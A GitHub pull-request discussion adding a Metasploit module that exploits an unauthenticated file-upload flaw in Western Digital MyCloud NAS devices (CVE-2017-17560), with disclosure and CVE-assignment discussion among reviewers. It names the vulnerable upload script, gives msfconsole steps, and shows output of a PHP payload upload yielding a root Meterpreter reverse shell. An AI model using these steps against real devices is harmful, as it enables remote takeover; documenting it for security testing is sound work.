New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add wd_mycloud_multiupload_upload exploit #9248

Merged
merged 2 commits into from Dec 14, 2017

Conversation

Projects
None yet
6 participants
@Zenofex
Contributor

Zenofex commented Nov 28, 2017

This pull request adds a Western Digital MyCloud unauthenticated command execution exploit.

This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.

This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172

Verification

  • Start msfconsole
  • use exploit/linux/http/wd_mycloud_multiupload_upload
  • set RHOST [IP]
  • check
  • Verify device reported as vulnerable
  • run
  • Verify shell is spawned

Example Output

msf > use exploit/linux/http/wd_mycloud_multiupload_upload
msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
RHOST => 192.168.86.104
msf exploit(wd_mycloud_multiupload_upload) > check
[+] 192.168.86.104:80 The target is vulnerable.
msf exploit(wd_mycloud_multiupload_upload) > run

[*] Started reverse TCP handler on 192.168.86.215:4444 
[*] Uploading PHP payload (1124 bytes) to '/var/www'.
[+] Uploaded PHP payload successfully.
[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
[*] Sending stage (37543 bytes) to 192.168.86.104
[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
[+] Deleted .7bc5NqFMK5.php

meterpreter > getuid
Server username: root (0)

@bcoles bcoles self-requested a review Nov 28, 2017

@bcoles

bcoles approved these changes Nov 28, 2017

@bcoles

This comment has been minimized.

Show comment
Hide comment
@bcoles

bcoles Nov 28, 2017

Contributor

Thanks @Zenofex

Please send a PCAP to msfdev [at] metasploit.com

Contributor

bcoles commented Nov 28, 2017

Thanks @Zenofex

Please send a PCAP to msfdev [at] metasploit.com

@bcoles bcoles added the module label Nov 28, 2017

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Nov 29, 2017

Contributor

So there's no CVE or BID or any other kind of reference number or name on this module. I'm pretty sure I recall you mentioning that you already disclosed to the vendor before DEFCON -- did they assign a ticket number or anything? I just would like to follow up with them and ask if they'd like us to assign a CVE for this.

Contributor

todb-r7 commented Nov 29, 2017

So there's no CVE or BID or any other kind of reference number or name on this module. I'm pretty sure I recall you mentioning that you already disclosed to the vendor before DEFCON -- did they assign a ticket number or anything? I just would like to follow up with them and ask if they'd like us to assign a CVE for this.

@Zenofex

This comment has been minimized.

Show comment
Hide comment
@Zenofex

Zenofex Nov 29, 2017

Contributor

Hey todb,

We disclosed to the vendor at DEFCON 25 and in the weeks after over email but they have been unresponsive. We do not have a CVE but are happy to do whatever you think is appropriate. I can add a link to the presentation slides and/or video as well, how would you like me to proceed?

Contributor

Zenofex commented Nov 29, 2017

Hey todb,

We disclosed to the vendor at DEFCON 25 and in the weeks after over email but they have been unresponsive. We do not have a CVE but are happy to do whatever you think is appropriate. I can add a link to the presentation slides and/or video as well, how would you like me to proceed?

@wwebb-r7

This comment has been minimized.

Show comment
Hide comment
@wwebb-r7

wwebb-r7 Nov 29, 2017

Contributor

@Zenofex regardless of whatever you and @todb decide on the lack of CVE, it would be helpful to go ahead and link any presentation or video you have in the references.

Contributor

wwebb-r7 commented Nov 29, 2017

@Zenofex regardless of whatever you and @todb decide on the lack of CVE, it would be helpful to go ahead and link any presentation or video you have in the references.

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Nov 29, 2017

Contributor

Yep, a link to the presentation material in the References would be super helpful.

I'll bug them and see if I can't get a response myself. Thanks, @Zenofex !

Contributor

todb-r7 commented Nov 29, 2017

Yep, a link to the presentation material in the References would be super helpful.

I'll bug them and see if I can't get a response myself. Thanks, @Zenofex !

@busterb busterb self-assigned this Nov 30, 2017

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Nov 30, 2017

Contributor

Verified pcap, this looks good. Thanks @Zenofex

Contributor

busterb commented Nov 30, 2017

Verified pcap, this looks good. Thanks @Zenofex

@Zenofex

This comment has been minimized.

Show comment
Hide comment
@Zenofex

Zenofex Nov 30, 2017

Contributor

Added the requested additional reference URLs. todb, let me know if anything is needed from me for the CVEs.

Contributor

Zenofex commented Nov 30, 2017

Added the requested additional reference URLs. todb, let me know if anything is needed from me for the CVEs.

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Dec 8, 2017

Contributor

Welp, it's been 9 days I haven't heard anything back -- and according to our CNA agreement, we shan't be assigning a CVE unless the vendor acknowledges.

So, the lack of CVE shouldn't hold anything up, since we have decent secondary references. I'll bug CERT/CC and see if they can toss one our way. If so, I'll add it post-facto.

Contributor

todb-r7 commented Dec 8, 2017

Welp, it's been 9 days I haven't heard anything back -- and according to our CNA agreement, we shan't be assigning a CVE unless the vendor acknowledges.

So, the lack of CVE shouldn't hold anything up, since we have decent secondary references. I'll bug CERT/CC and see if they can toss one our way. If so, I'll add it post-facto.

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Dec 8, 2017

Contributor

Reported to CERT/CC, they have a tracking number VRF#17-12-JQCYD for it now.

Contributor

todb-r7 commented Dec 8, 2017

Reported to CERT/CC, they have a tracking number VRF#17-12-JQCYD for it now.

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Dec 12, 2017

Contributor

CVE Request 432582 for CVE ID filed. Bccause Western Digital has failed to acknowledge this vulnerability (despite the overwhelming evidence that it exists), Rapid7 is unable to assign a CVE ourselves. We've sent the request up to MITRE who can assign out of their block (we used to get these out of CERT/CC, but apparently that's now how it works anymore, which is fine).

Contributor

todb-r7 commented Dec 12, 2017

CVE Request 432582 for CVE ID filed. Bccause Western Digital has failed to acknowledge this vulnerability (despite the overwhelming evidence that it exists), Rapid7 is unable to assign a CVE ourselves. We've sent the request up to MITRE who can assign out of their block (we used to get these out of CERT/CC, but apparently that's now how it works anymore, which is fine).

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Dec 12, 2017

Contributor

CVE-2017-17560 has been allocated for this.

I think we're good to land this, right @bcoles ? I can either ninja-edit the references to include this on merging, or you can.

Contributor

todb-r7 commented Dec 12, 2017

CVE-2017-17560 has been allocated for this.

I think we're good to land this, right @bcoles ? I can either ninja-edit the references to include this on merging, or you can.

@bcoles

This comment has been minimized.

Show comment
Hide comment
@bcoles

bcoles Dec 13, 2017

Contributor

@todb-r7 +1 looks good to me

Contributor

bcoles commented Dec 13, 2017

@todb-r7 +1 looks good to me

@busterb busterb merged commit 1ced399 into rapid7:master Dec 14, 2017

2 checks passed

Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Dec 14, 2017

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Dec 14, 2017

Contributor

Added cve reference and landed 125a079 - thanks!

Contributor

busterb commented Dec 14, 2017

Added cve reference and landed 125a079 - thanks!

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Dec 14, 2017

Contributor

Release Notes

This adds a Western Digital MyCloud unauthenticated command execution exploit, CVE-2017-17560.

Contributor

busterb commented Dec 14, 2017

Release Notes

This adds a Western Digital MyCloud unauthenticated command execution exploit, CVE-2017-17560.

@Zenofex

This comment has been minimized.

Show comment
Hide comment
@Zenofex

Zenofex Dec 14, 2017

Contributor

Woohoo, thanks everyone!

Contributor

Zenofex commented Dec 14, 2017

Woohoo, thanks everyone!

@tdoan-r7 tdoan-r7 added the rn-exploit label Dec 20, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment